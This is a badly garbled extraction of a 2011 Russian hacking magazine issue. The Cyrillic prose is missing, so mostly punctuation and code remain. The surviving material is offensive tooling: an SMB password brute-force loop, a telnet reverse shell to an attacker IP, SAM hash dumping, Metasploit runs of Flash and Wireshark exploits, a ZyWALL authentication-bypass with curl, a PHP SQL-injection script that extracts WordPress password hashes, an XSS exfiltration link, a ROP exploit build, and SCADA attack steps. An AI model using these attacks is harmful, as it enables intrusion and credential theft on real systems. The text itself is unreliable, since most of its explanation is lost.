Re8L1Ekyky67QZ1hLnjM5UUde0ECwLJoExKcppV0aCcGCmT
IHEIUEqjgaORCMxIC6e0CcguWw6aFjsVMkkIr7g77ZKPJjP
ZqIyd7sJAgVGoEGv2xsBxqNgYPj/gAwXEQA7" width="16"
height="14"/>

(, ,
base64):
data:[< >][;base64],<>

,
, , ,
- , ...
. ,
;). z
X 07 /150/ 2011

>> coding


GreenDog (agrrrdog@gmail.com)

Easy Hack
1

:

.

:
, ,

, . (,
<ctrl+alt+del>)
.
.
Process
Explorer . Tasklist.
. ,
.
, , .
:
tasklist /SVC


dll:
tasklist /P

:
WINPCAP.

:
NETRESEC
, . RawCap (www.netresec.
com/?page=RawCap). , ,
WinPCAP. ,
:
1) 17 ;
2) raw sockets Windows (
, - www.xakep.ru/magazine/
xA/077/112/1.asp);
3) ;
4) ,
WiFi-, loopback- PPP-.

. -, -

: ,

WINDOWS.

:
,

040

. Rawcap .
( ) Windows 7 ( ) Vista (
). -, .NET Framework
2.0. -, .
:
RawCap.exe _ __

. , ,
, , ,
. , . , .
- .
? , (.. ).
, X 07 /150/ 2011

. , -, (
), -,
, - . .

? ? . ,
, .
Ed Skoudis Penetration Testing
Ninjitsu. (www.coresecurity.com/
content/webcast-series-with-sans).
:
C:\> for /L %i in (1,1,255) do @ping 10.10.10.%i n 1
| find "Reply"

for ;
/L , ;
%i ;
in (1,1,255) 1 255 1;
do @ping ping;
10.10.10.%i IP- ;
n 1 ;
| find "Reply" |
find, Replay.
. ,
10.10.10.1-255.
, , .
:
Command1 & Command2 ;
Command1 && Command2 , ;
> ;
>> ;
For /F ;
Command 2 > nul ;
Command 2 >> errors.txt .
, :
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul

:

VIRUSTOTAL.

:
.
,
, . -.
, .
.
, .
Himikat,
caps12-MultiScanner.
forum.antichat.net/thread266146.html.
caps12-security.blogspot.com.
, - - .

. ,
.

. .
. 13 , . X 07 /150/ 2011

, ftp-
| find "Name" && echo 10.10.10.%i

ftp-:
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.
txt & echo open 192.168.0.1 %i > ftp.txt & echo quit >> ftp.txt &
ftp -s:ftp.txt 2>>ports.txt


SMB:
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @
echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j
>> success.txt && net use \\10.10.10.10 /del)

, : , -, , .
.
. ,
telnet. ,
, Vista.
, nix , .
,
:
telnet [attacker_IPaddr] [port1] | /bin/bash | telnet
[attacker_IPaddr] [port2]

.
-.

,
. ,
, , .
. :
1) ;
2) ;
3) ;
4) .

,
MSF

041

:
ORACLE.

:
Oracle
TNS listener.
.
, ,
, login denied, . , ,
.
, .
, , ,
.

( )
ora-userenum. OAK (Oracle Assessment Kit),
David Litchfield (www.databasesecurity.com/dbsec/OAK.
zip). ,
.
:
ora-userenum.exe 192.168.0.1 1521 ORCL1 userlist.txt

192.168.0.1 1521 Oracle;


ORCL1 SID ;
userlist.txt (
OAK).
, , .

:
METASPLOIT
FRAMEWORK.

nmap --script oracle-brute -p 1521 --script-args oraclebrute.sid=ORCL <target>

DNS-:

:
MSF .
. . , . , , . , ,
MSF .
,
, - .

BackTrack. , BT,
. , ,
- , MSF .
Nmap NSE (Nmap Scripting Engine)
. , , . : nmap.org/nsedoc.
. - snmp-:
nmap sU p161 --script=snmp-brute --scriptargs=snmplist=communities.txt <target>

nmap -p53 script dns-zone-transfer script-args


dnszonetransfer.domain=example.com <target>

SMB-.
MS08-067:
nmap -p445 script=smb-check-vulns <target>

MSSQL- (,
) :
nmap --script broadcast-ms-sql-discover

200. , ,
.

dropbox

, sU udp;
p161 snmp ;
--script=snmp-brute , ;
--script-args=snmplist=communities.txt .
MSF.
, MSF Win7.
Oracle (
MSF Win):

042

X 07 /150/ 2011

:
WINDOWS.

:
,
. , c.
.
NTLM- .
gsecdump, fgdump. .
-, (- ). . -, 64- , .
, NTLM- (MS Cache)
Windows. -
,
.
Cain&Abel (www.oxid.it/cain.html), python (code.google.com/p/creddump).
creddump Windows, pycrypto
(www.amk.ca/python/code/crypto). ,
, (hives),
.

ntbackup.exe. ,
. ,
Volume Shadow Copy (VSS).
. , ,
:
Ntbackup.exe backup systemstate /j "Blah-blah-blah" /f
"c:\backup.bkf"

backup , ;
Systemstate
;
/j "Blah-blah-blah"
DVD
;
/f "c:\backup.bkf"
.
dvd
. ,
,
.
. XP 500 . ,
( ) .
( ) .
, C:\WINDOWS\system32\config
, ( )
HKEY_CURRENT_CONFIG System
%systemroot%\repair. HKEY_CURRENT_USER Ntuser.dat
. - HKEY_LOCAL_MACHINE\SAM Sam
, . ,
HKEY_LOCAL_MACHINE\Security Security
, , 10 HKEY_LOCAL_MACHINE\Software Software
, ,
HKEY_LOCAL_MACHINE\System System
. , ( )
HKEY_USERS\.DEFAULT Default
, . Vista 2008 Microsoft
? ntbackup. , .
liveCD, .
. , . ntbackup.exe, ntmsapi.dll,
vssapi.dll %systemroot%\system32 XP

, , , . .
2008
.
? , .
.
Vista 2008 (
R2) : NTBackup can be used
--! ! Pass The Hash!
under Windows Vista and Windows Server 2008
by enabling the Removable Storage Manager
component in Turn Windows features on or off
control panel. ,
. , Win 7 2008
R2 ( ) .

,
. ,

.
:
pwdump.py SYSTEM SAM

( ):
lsadump.py SYSTEM SECURITY
:
cachedump.py SYSTEM SECURITY

, . z

X 07 /150/ 2011

043


iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)

, ! ,
,
. ,
!

01

ADOBE FLASH
PLAYER 10.2.153.1 SWF

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
: 11 2011
: sinn3r
CVE id: CVE-2011-0611
Flash Player ,
flash-.
flash- ,
, , , .

.
Adobe Flash Player,
- ,

, , ,
. :
.
: Adobe Flash Player, Adobe Reader Acrobat,
Microsoft Word/Excel ( .wf- doc- xls-
). , Adobe
Reader X sandbox , . , :).

044

EXPLOIT
0x100d01f6
Flash10o.ocx ( Adobe Flash Player 10.2.153.1).
ActionScript, :
Date.prototype.c_fun = SharedObject.prototype.getSize;
Date.prototype.getDay = function ()
{
this.c_fun();
};
var eval(0) = new Date(1.41466385537348e-315);
(eval(0)).getDay();

,
, ,
, SharedObject.prototype.getSize(),
Date ,
SharedObject.prototype.getSize. Date 1.41466385537348e-315, 0x11111110, , ,
heap spraying.
Date.c_fun(),
SharedObject.prototype.getSize(), Date
SharedObject,
, Date (0x11111110),
.
metasploit, :
msf > use exploit/windows/browser/adobe_flashplayer_
flash10o
X 07 /150/ 2011

Flash10o.ocx
msf exploit() > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit() > set CMD calc.exe
CMD => calc.exe
msf exploit() > exploit
[*] Exploit running as background job.
msf exploit(adobe_flashplayer_flash10o) >
[*] Using URL: http://0.0.0.0:8080/Jk32OyCPJ0NUR6B
[*] Local IP: http://192.168.2.20:8080/Jk32OyCPJ0NUR6B
[*] Server started.

. (http://192.168.2.20:8080/Jk32OyCPJ0NUR6B)
, ,
Internet Explorer ...
TARGETS
IE 6/7 Windows XP SP3 Windows Vista.
SOLUTION
Adobe Flash Player.

02


WIRESHARK <= 1.4.4
PACKET-DECT.C

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

X 07 /150/ 2011

BRIEF
: 18 2011
: Paul Makowski ,
sickness POC, corelanc0d3r , ROP + metasploit.
CVE id: CVE-2011-1591
Wireshark ( Ethereal)
, . .
, Wireshark,
tcpdump, Wireshark

.
,
(promiscuous mode).
Wireshark
,
.
pcap, , . , Wireshark
, ,
, ,
.
EXPLOIT
( wireshark 1.4.1, packetdect.c, 1886):

045

Wireshark
...
/* fill B-Field */
if(pkt_len>DECT_PACKET_INFO_LEN+2)
memcpy((char*)(&(pkt_bfield.Data)), (char*)(pkt_ptr+8),
pkt_len-5-8); // <---
else
memset((char*)(&(pkt_bfield.Data)), 0, 128);
pkt_bfield.Length=pkt_len-DECT_PACKET_INFO_LEN-8;


:
# tcpreplay -i ath0 -t test.pcap

wireshark .
,
metasploit , :

...

pkt_bfield dect_bfield, :
struct dect_bfield
{
guint8 Data[128];
guint8 Length;
};

, 128-
Data, .
,
pcap- . , ,
scapy:
#!/usr/bin/env python
import sys
from scapy import *
wrpcap("test.pcap",Ether(type=0x2323)/("A"*1000))

wireshark, -

046

msf exploit(wireshark_packet_dect) > use exploit/windows/


fileformat/wireshark_packet_dect
msf exploit(wireshark_packet_dect) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit(wireshark_packet_dect) > set CMD calc.exe
CMD => calc.exe
msf exploit(wireshark_packet_dect) > exploit
[*] Creating 'passwords.pcap' file ...
[*] Preparing payload
[*] Writing payload to file, 1554 bytes
[*] Generated output file /opt/framework-3.6.0/msf3/data/
exploits/passwords.pcap

wireshark, .
:
# tcpreplay -i ath0 -t /opt/framework-3.6.0/msf3/data/
exploits/passwords.pcap

:)
TARGETS
Win32 ( DEP & ASLR).
X 07 /150/ 2011

, flash-
SOLUTION
Wireshark.

03

ZYXEL ZYWALL USG

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
ZyWALL USG
ZyXEL ,
, c,
.
RedTeam Pentesting
,
: .
, .
-
.
EXPLOIT
ZyXEL ZyWALL USG zip-,
zip- .
, 2.21(BQD.2) ZyWALL USG 20
(ZyWALL USG 20_2.21(BDQ.2)C0.zip)
:
221BDQ2C0.bin
221BDQ2C0.conf (7354 bytes)
221BDQ2C0.db
221BDQ2C0.pdf
221BDQ2C0.ri
firmware.xml

221BDQ2C0.bin 221BDQ2C0.db,
, zip- (,

/usr/bin/file).
:
$ unzip -l 221BDQ2C0.bin
Archive: 221BDQ2C0.bin
X 07 /150/ 2011

Name
---compress.img
db/
db/etc/
db/etc/zyxel/
db/etc/zyxel/ftp/
db/etc/zyxel/ftp/conf/
db/etc/zyxel/ftp/conf/htm-default.conf
db/etc/zyxel/ftp/conf/system-default.conf (7354 bytes)
...
filechecksum
filelist
fwversion
kernelchecksum
kernelusg20.bin
wtp_image/
------24 files
$ unzip -l 221BDQ2C0.db
Archive: 221BDQ2C0.db
Name
---db_remove_lst
etc/
...
etc/zyxel/
etc/zyxel/ftp/
etc/zyxel/ftp/.dha/
etc/zyxel/ftp/.dha/dha_idp/
etc/zyxel/ftp/cert/
etc/zyxel/ftp/cert/trusted/
etc/zyxel/ftp/conf/
etc/zyxel/ftp/conf/htm-default.conf
etc/zyxel/ftp/conf/system-default.conf (7354 bytes)
...
filelist
------31 files

, 221BDQ2C0.conf
system-default.conf
.

,
:
PkCrack ;
Elcomsoft Advanced Archive Password Recovery
.

047

ZyXEL

compress.img unsquashfs.
ZyWALL USG -
Apache. , . mod_auth_zyxel.so
/etc/service_conf/httpd.conf,
compress.img.
AuthZyxelSkipPattern,
:
AuthZyxelSkipPattern /images/ /weblogin.cgi /I18N.js /
language

CGI-. , ,
:
https://192.168.0.1/cgi-bin/exportcgi?category=config&arg0=startup-config.conf

Apache
CGI-. ,
/images/ , export-cgi
:
https://192.168.0.1/cgi-bin/export-cgi/images/?category=c
onfig&arg0=startup-config.conf

/images/
AuthZyxelSkipPattern, .
,
.
, file_upload-cgi, , , . /
images/, .
, startup-config.

048

conf, , , . , ,
.
, , /
:
$ curl --silent -o startup-config.conf "https://192.168.0.1/
cgi-bin/export-cgi/images/?category=config&arg0=startupconfig.conf"
$ curl --silent -F ext-comp-1121=50 -F file_type=config -F
nv=1 -F "file_path=@startup-config.conf;filename=startupconfig.conf" https://192.168.0.1/cgi-bin/file_upload-cgi
/images/

TARGETS
ZyXEL USG, 25 2011 ,
.
SOLUTION
, 25 , -.

04

SQL XSS
WORDPRESS SERMONBROWSER
PLUGIN

CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Ma3sTr0-Dz
.
SQL
.
, (
).
X 07 /150/ 2011

WordPress SermonBrowser
EXPLOIT
php,
,
. ( ):
<?php
$t=array(
"db_usr"=>"user()",
"db_ver"=>"version()",
"db_nam"=>"database()",
"usr_nm"=>"user_login",
"passwd"=>"user_pass"
);
function text2hex($string) {
$hex = '';
$len = strlen($string) ;
for ($i = 0; $i < $len; $i++) {
$hex .= str_pad(dechex(ord($string[$i])), 2, 0, STR_PAD_
LEFT);
}
return $hex;
}
foreach($t as $r=>$y){
$x=@file_get_contents($argv[1].
"?sermon_id=-1/**/UnIoN/**/SeLeCt/**/group_concat(0x".
text2hex("<$r>").
",$y,0x".text2hex("<$r>").
"),2+from+wp_users+where+ID=1--"
);
preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);

X 07 /150/ 2011

XSS WordPress SermonBrowser


echo $u = ($dz[1][0]) ? "[-] $r : ".$dz[1][0]."\n" :
"[-] $r : Failed !\n";
}
?>

TARGETS
WordPress SermonBrowser Plugin <= 0.43
SOLUTION
0.44.1 . z

049


(http://oxdef.info)

-.
OPERA


. ,
Google Chrome.
Opera. ,
!

, -
. :
.
,
-. Opera, , -
. ,
Opera ( ?)
. Chrome
Opera.
.

Opera Google
Chrome. , HTML, CSS JavaScript,
-

050

W3C Widgets specification.


Whats in an Opera extension? (bit.ly/
k5WkoL).
. Opera
( ):
( index.html)
;
, ,
-;
JavaScript- CSS- ,
- (, ,
mailto: );
config.xml ( manifest.json Google
Chrome) -
: , ,
;

.
X 07 /150/ 2011

HTTP://WWW
links
W3C Widgets
specification:
www.w3.org/TR/widgets.

XSS Google Mail Notifier


Opera
(UserJS),
,
, ,
JavaScript-.
-
( ).
:

;
HTML-
(, );
- ( ) ;

JavaScript.

,
,
, :
// ==UserScript==
// @include http://example.com/*
// ==/UserScript==
(function ()
{
var links = document.getElementsByTagName('a');
for(var i = 0; i<links.length; i++) {
if (links[i].href.indexOf('http://' +
document.domain) != 0) {
links[i].innerText = '[->] ' +
links[i].innerText;
}
}
})();

,
,
,
( , ).

X 07 /150/ 2011

Google
Mail Notifier
:
<-> <->
/ <->

, /
, Opera
Extensions API :
window.
widget, opera.extension opera.contexts
, ,
.

.
(
)

.
,
..

:
goo.gl/LwQ50.
Opera Extensions API:
www.opera.com/docs/
apis/extensions/.
XSS:
goo.gl/1ey4L.

:
goo.gl/BIKKM.
Widget Access
Request Policy:
www.w3.org/TR/
widgets-access/.

UserJS-
Opera: www.opera.
com/docs/userjs/.

XSS


Opera Google Chrome (,
..).
Google Mail Notifier.
, ,
Google Chrome, ,
XSS.

.
, , .
, , . ,

(js/menu.js):

WARNING
warning

,

.

...
// Check if there are Messages to display
if(event.data.msg && event.data.msg.length > 0)
{

051

Opera
// Add every message
for(var i=0; i < event.data.msg.length; i++)
{
var tooltip = "<div class='tooltip'><p><u>" +
lang.popup_to + " " + event.data.msg[i].sendermail +
"</u><br/>" + lang.popup_from + " " +
event.data.msg[i].authormail + "<br/><br/></p><p>" +
event.data.msg[i].summary + "</p>"
var msg = $('<div></div>').addClass('message').attr(
"title", tooltip).tooltip({
left: -15
})
.html("<strong>" + event.data.msg[i].authorname +
"</strong> : " + event.data.msg[i].title).click(
{
link: event.data.msg[i].link
}, LoadLink);
$('#message_box').append(msg);
...

,
HTML-.
( Opera Google
Chrome) ,
,
, , RSS-
. ,

.
-
JSON!
JavaScript-, eval(),
, :

052

var msg = eval("(" + response_text + ")");

API
JSON-:
var msg = JSON.parse(response_text);


, .

XSS- , , . Opera
- ( Google Chrome),
.
. , ,
XSS-:
,
,
;
, widget.
preferences ,
,
Reddit Envelope;
Google Notifier
(, ) ;


- (. ).

X 07 /150/ 2011

, , . ,
JavaScript ,
document.cookie .
Opera
, :
,
(, -)
, , ,
API-
(, XMLHttpRequest)
(, iframe, script, img).


, :
...
<!-- Access Policy -->
<access origin="https://mail.google.com"/>
<access origin="https://www.google.com"/>
...

. , ,
,
:
//...
var a = document.createElement('a');
var d = document.getElementById('open');
a.href = "http://evilsite.com/sniff.php?d=...";
a.id = "foo";
a.innerText = 'Open GMail Tab';
d.parentNode.replaceChild(a, d);

Google Chrome, Opera


. , ,
UserJS, - , :
JavaScript-
,
-. ,

,
-.

<access>
,
. , , ,
,
! Google
www.google.com, .
,
XSS-:

, Opera . ,
( )
, DOM.
. ,
, .

(*)
origin ,
;
subdomains
(-
).

Opera ,
Google Chrome. ,
.
,
, - , -
( , ) ,
Opera . ,
, .
, . z

,
.
,
X 07 /150/ 2011

Outro

053


(kaminkov@itdefence.ru),

SCADA

Rockwell Automation 45%

Schneier Electrics 40%

Areva Teleperm XS 25%

Wonderware InTouch 30%

Tekla XPower 20%

Mitsubishi MX4 SCADA 30%

Netcon 3000 15%

Wonderware InTouch 45%


SCADA Axeda 34%
21%

metsoDNA 10%

RTA PLS 55%


GH SCADA 45%
PSI Control 33%

GE CIMPCity 45%
GE XA21 EMS 24%
Proficy SCADA iFIX 20%
Areva EMS SCADA 11%

Wonderware InTouch 44%

Siemens Win CC 49%

SOLONs SCADA 34%

ABB Ranger 34%


PcVue 11%
RsView SCADA 8%

SCADA Axeda 22%

View Star 750 55%


Pidpa 45%


Wonderware InTouch 45%

Proficy SCADA iFIX 30%

CitectSCADA 55%

CitectSCADA 20%

Siemens Win CC 45%

Motorola SCADA 5%

SCADA

. (rusin@itdefence.ru)

Stuxnet, ,
. ?
.
,
.
?

,
- . .
.
,
: ,
, , -

054

, . ,
, ( ).
: (SCADA), ,
.
,
SCADA, ,
X 07 /150/ 2011

154.68.54.XX

1.

3.

172.16.1.0
RS232

TCP/IP

MODBUS

10.0.1.0

2. APM SCADA

, ,
?

, 60%
SCADA
(Windows, Linux). (, ),
QNX,
( ),
(,
).

/ SCADA:
SCADA- ( , /
SCADA);
Teenable Nessus ( SCADA
);
Rapid7 Metasploit Project ( :
exploits/scada/ ).
,
,
nmap. ,
:
,
Stuxnet.

,
. -

X 07 /150/ 2011

( ) : (
,
-), (,
, ) ( , ).
1. .

IPSec SSL,
VPN. , . ,
()

. , .
IP-, ,
, .

. ,

.
GPRS/GSM-,
IP-
.
.

.
, ,
(RS-232 / RS-485)
MODBUS-, MODBUS-
TCP/IP Ethernet /
Industrial Ethernet .
2. - SCADA.
,

HTTP://WWW
links


.
,
,
,
RISI:
securityincidents.org.

DVD
dvd


Stuxnet
Trend Micro.
,
DVD
Teenable
Nessus,
SCADA.

055


Slave-, MODBUS
. , .
, Stuxnet
- , USB-
.
. SCADA, , ,
, .
,
- .
3. (BAN Business Area Network).
,
, .
. .

HMI -
.
.
, .

.
,
, -
. - BAN
: , , -
.

Stuxnet
NMAPa (5.51) ,
LUA NMAP Scripting
Engine, stuxnet-detect. Stuxnet SMB- :
nmap --script stuxnet-detect -p 445 <host>
, , Trend Micro.
DVD, (bit.
ly/chokfa). ,
Stuxnet?
Stuxnet RPC-
. RPC-
() ,
( ). RPC .
(0x00), (0x04).
SMB-over-TCP (TCP 445), ,
Stuxnet (, MS10-061),
DCE/RPC (//browser ), UUID
. !

Stuxnet.
Trend Micro.

056

X 07 /150/ 2011

SCADA Firebird. ( ),
, .
,

.
.
,
. , Cisco
Router and Security Device Manager Cisco 7301,
CISCO SDM. ,
,
.
, :
level 15;
cisco (
,
).
, show running
config, . -

, .
,
. ,
:
, TCL,

;
, , CISCO Cisco IOS Embedded
Packet Capture (EPC) , .
, ,
,
EPC:
# EXEC
enable
# "pktrace1", 256 ,
#

CISCO
secret 7- CISCO-
secret 5 (CISCO type 5 passwords). secret 7,
, Cain and Abel
. ,
:
username jbash enable secret 5
$1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
username jbash password 7 07362E590E1B1C041B1E124C0A2F2E2
06832752E1A01134D

, md5,
,
, Passwords Pro, John The Ripper, EGB ,
. :
$1$FKKk$t2NOQP.vSScMbwJWERNU0/ (type "5"),
FKKk (salt)

X 07 /150/ 2011

:
openssl passwd -1 -salt FKKk cisco

cisco .

057

SCADA
# 100
monitor capture buffer pktrace1 size 256 max-size 100 circular
# ,
# FastEthernet, ,
#
monitor capture point ip cef ipceffa0/1 fastEthernet-type
0/1 both
#
monitor capture point associate ipceffa0/1 pktrace1
#
monitor capture point start ipceffa0/1
#
show monitor capture buffer pktrace1dump

TCP 502,
, MODBUS TCP. , .
,
,


,
,

2008-2010 .
:
7 2008 , 2 Hatch (
, ), 48

( 2006
Browns Ferry -

);
2008 , Tennessee Valley Authority (TVA)
( 11
, 8 , 3 , 29 ), (GAO, HHS) 2000
.
, , ,
, ;
26 2008 , ,
.

058

CISCO, . , ,
- : , :
. ,
SCADA
DCOM Microsoft Windows,
.
( , )
. , , SDM,
. CISCO secret 7
MD5.

, .
IP-, .
,
SCADA-.
TCP 502-, MODBUS,

, , .
SCADA- ,

. , , .
SNMP- . ,
web-, SCADA -

MODBUS
MODBUS
: ASCII RTU. ( ,
)
. ASCII-
ASCII-.
.
ASCII- (:, ASCII 3A
hex) (CRLF, ASCII 0D 0A hex).
0-9, A-F.

. ,
( ) .

X 07 /150/ 2011


. , :
1) : KASKAD/Web_Clnt.dll/ShowPage?Web_Clnt.ini.
:
Project="C:\Program Files\Kaskad\Projects\
KVisionDemoProject\kaskad.kpr"

2) : KASKAD/Web_Clnt.dll/
ShowPage?../../../Projects/KVisionDemoProject/Configurator/Events.ini
3)
UserName=sysdba
Password= ( XOR 0x1B)
4) :
KASKAD/Web_Clnt.dll/ShowPage?../../../Projects/KVisionDemoProject/
Configurator/Stations.ini
ClntIPAdr1=127.0.01
= 3050

5) TCP 3050 ( Firebird):


\x00\x00\x00\x35\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a
\x4a\x4a\x4a

6) SCADA:
INSERT INTO USERLIST (USERNAME, USERPASSW, NAME, GRPNAME,
FULLNAME, FLAGS, FLAGS_, ALLOWTIME, REGISTERTIME,
LASTENTERTIME, LASTPWDCHANGETIME, PWDKEEPPERIOD, STATIONS,
DROPTIMEOUT, PSPRDACCESS, PSPWRACCESS, PSPRDACCESS_,
PSPWRACCESS_) VALUES ('ITD', '745F87A6B56BACAB', 'itd',
'', ', 3, null, null, '200201-30 13:11:36.0', '2002-01-30 13:11:36.0', '2002-01-30
13:11:36.0', 0, null, null, null, null, null, null);

MODBUS !

, MODBUS,
. , .
1) , PLC
listen only. PLC
, .
MODBUS (Master) ( ). (Slave)
X 07 /150/ 2011

MODBUS .

.
(HOST) .
. PLC- listen only
slave-,
. Slave- , .
.
2) (,
) , . , . , Modbus SCADAPack
ClearSCADA,
60 260 . ,
, :).
3) , .
web- ftp-.
, Appweb Embedded Web Server
, Apache Benchmarking
Tool (ab), :
ab -n 1000 -c 50 http://xxx.xxx.xxx.xxx/index.html
-n
-c

4) .
MODBUS, , , ,
, . -
, ARP-.

:
,
, SCADA.
,
- ( ).
, , , 2. , , ,
, , ,
. ! z

059

,
.
? , ,
. .

Trustwave, 32% . ,
24% , : , VPN + socks chain , . Verison : 65%
.

1%

3%

1%

4%

0 .5%

2%

0 .5%

0 .5%

32%

2%

0 .5%

0 .5%

0 .5%

6%

1%

0 .5% 0 .5%

1%

0 .5%

2%

7%

1%

2%

4%

24%


, Trustwave . ,
, , .
.


28

51.5

87.5

156.5

060

50

100

150
X 07 /150/ 2011

, , Trustwave, - ,
. Verison : 800
, , 90% - , 10% - .


Verison

55%

SQL-

67% /30%

52% /34%
49% /19%

- -



SQL-
CMS

73% /45%

8%

6%
6%

2%

2%

2%

DoS

2%

18%

21% /21%
14% /24%
10% /21%
10% /19%
9% /15%
1% /4%
1% /1%
1% /1%
1% /1%
1% /1%
1% /1%
1% /1%
4% /8%

PCI DSS
, . ,
PCI DSS, . ,
, - , , .

% PCI DSS

97.5%
83.6%
74.6%

80%

92.6%

90.9%

99.2%

98.4%

95.1%

10

11

12

68.9%

60%

48.4%

40%
20%

8.1%

7.4%

X 07 /150/ 2011

061


Digital Security (twitter.com/asintsov))

0DAY


Music Maker 16

, !
MAGIX AG Music
Maker 16.
, ,
DEP ASLR.

, , ,
(
Digital Security).
MAGIX AG
. :
Acidgen Corelan Team
MAGIX AG Music Maker 16.
,
,
PoC. , .

, , .
, MAGIX AG - ,
. , :
, PoC -
.

062

0day

Music Maker 16, .


,
. ,
, . ,

.
, , .
, , .mmm, .
, - _Demo.mmm
HEX- (, 010-Editor). , , ( )
.
.
, , Music Maker
. ,
,
X 07 /150/ 2011

- 2,

, . ,
, , ,
''. ,
.
, .
( Immunity Debuger)
Music Maker .

. Access Violation,
, ,
'a' .mmm . , ,
0day- , - .
, Acidgen ,

Corelan Corelancod3r,
pvefindaddr. , . , , ,
:).

, ,
:
PoC, Music Maker . , ,
. , ,
. : , @ontrif,
!
: SEH- pop
REG/pop REG/retn, ,
- - SafeSEH ( , safeSEH).
, Access Violation,
pop/pop/retn.
, 8 , ESP
8 ( ).
, , SEH-,
,
SEH-. , RETN
,
EIP ,
SEH.
JMP +0x12 ( ,
SEH-, ,
, ). ,
X 07 /150/ 2011

.mmm-
:
aaaaaaaaXXXXYYYYZZZZZZZZZZZ
aaaaaaaa
XXXX SEH, 0x909010EB
(JMP +0x12/nop/nop)
YYYY SEH-,
pop/pop/retn
ZZZZ NOP

:
1. ;
2. Access Violation;
3. YYYY;
4. POP/POP/RETN => XXXX;
5. XXXX = JMP +0x12;
6. ZZZZZ, . .
, .
. Windows 7 x64, DEP
ASLR. - ontrif YYYY
dll', - ASLR BaseFixUP.
YYYY , , YYYY ZZZZ , DEP
. ,
Windows XP. ontrif
, YYYY .
Access Violation , (- ).

, YYYY! ,
, ontrif.
YYYY.
ASLR, DEP.

ROP-

- . ,
, . ,
.
, ,
. SEH
508 ! - ,
. Corelancod3r -
+ egg-hunter- ( , --,
).
, .
, :
SEH 100. , +
. , -

063

- 1

metaploit- pvefindaddr , SEH


, , , .
: SEH (YYYY) ROP-
, ESP - ,
ROP- . YYYY ROP, ESP, RETN,
ROP- ROP-
. Corelancod3r'.
ASLR LTKRN14N.dll LTDIS14n.dll. ,
ADD ESP,4F8 # RETN 4 0x20012026 (
, ASLR).
Access Violation
, aaaaaaaa.
, RETN 4
, , ADD ESP, 40 # RETN. ,
ZZZZ, -.

ROP-

ROP- -,
.
.
, - aaaaaaaa
, ,
:
PPPPPPPP/FFFFFFFFaaaaaaaaXXXXYYYYZZZZZZ

064

PPPPPPPP
FFFFFFFF
aaaaaaaa
YYYY
ZZZZ

,
ROP: 0x20012026
SEH-ROP: 0x20012026
ROP-

. ,
: aaaaaaaaXXXXYYYYZZZZZZ
ROP-.
FFFF, ROP- , FFFF
VirtualAlloc. ,
. , , VirtualProtect,

.
, VirtualAlloc, ,
, ,
.
VirtualAlloc kernel32.dll,
- ASLR, LTDIS14n.dll ,
.data-, , - ASLR.
0x1FFAF160 VirtualAlloc. FFFF, -
. - (ZZZZZ) (FFFF), , FFFF,
X 07 /150/ 2011

!

metasploit-
ESP FFFFF, ROP-, FFFF ,
FFFF. FFFF- ,
PPPPPPPP. , 750 , . FFFFFFFF :
QQQQ1111222233334444WWWWJJJJJJ
QQQQ
- - 2
1111222233334444 - VA, 1
WWWW
- VA,
JJJJJJ
- stage 0 , PPPPPPPP

, , PPPP
, WW..WW
FFFF-, PPPP . stage 0 PPPP, VA,
PPPP , .
, . ,
, :). , Metasploit.

aaa_data = aaa_header # MMM-
aaa_data << "\x00"*1680
aaa_data << aaa_list
aaa_data << "\x00"*25
####
aaa_data << "C:\\aaa\\"
# 7.
aaa_data << shellcode
#
aaa_data << "a"*(target['Size']-shellcode.length)
aaa_data << "a"*328
#
aaa_data << "\x00"*16
####
aaa_data << "x"*320
# 4. -2
aaa_data << rop_gadgets2
# 5. stage 0
aaa_data << shell_jmp
aaa_data << "a"*61
#### ,
X 07 /150/ 2011

MMM-
#
# 2. ROP-: ADD ESP, 40 / RETN
aaa_data << rop_jmp*32
aaa_data << "a"*16
# 1. SEH, YYYY
aaa_data << [target.ret].pack('V')
# 3. 1 RETN
aaa_data << rop_nop*10
# 4. 1
aaa_data << rop_gadgets
aaa_data << "a"*31337

.
.

,
, . egg-hunter,
. Corelancod3r ,
egg-hunter' :).
750 , .
, ,
, , ,
DEFCON-. defcon-russia.ru, ( ). -
, -,
, WEB-, , , ,
.
hackerspace, ,
, .. ,
, ,
.
! z

065


(icq 884888, snipper.ru)

X-TOOLS
: XMProxy
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: xhugo

: ,
xxx.xxx.xxx.xxx;xxx xxx.xxx.xxx.xxx:xxx.
, .

, XMProxy

-.


, .

: Hack Record Book


: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Kronus and Svet

: ProxySocksGrabber
: *nix/win
: G1yuK


XMProxy ,
.
,
, , , geoip .
.

. : ,
,

.

: ,
.

, .
, ,
-. ,
-.
GeoIP
. ,
proxy:port - .

066

-

,

, .

spys.ru, ip
, javascript.
,
, , ,
.
:
1. proxy (grabber.py -t 0);
2. socks (grabber.py -t 1).

'-t'.

.
,


.
SQL- (,
n- ) .
!
Hack
Record Book

.
:
, ;
PR (
);

;
;
;
;
;
;
status bar;

( url more);
X 07 /150/ 2011

HTTP ;
drag & drop ;
settings.ini;
SQLite;
.NET 3.5.
:
1. KEY ;
2. .db ;
3. ,
,
, .


bit.ly/jFexpH.

: VK Video Spammer
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Ildon



. ,
, VK Video Spammer .
:
50
;
50
;
;
;
;
;
;
-
(
);
;
;
.
, VK ,

.



mail.
ru.
:


: MicSpy++
Nightmare!

,
. :
1. , ( ,
);
2. ;
3. KHz WMA-
( 8, 16 32).
: (,
10 )
WMA- 03.03.2011.17.17.17.
wma ( ).
:
= ( 10
600 , 1,8 ).
:
MicSpy++.exe C:\randomfolder\ 1800000 16

.
:
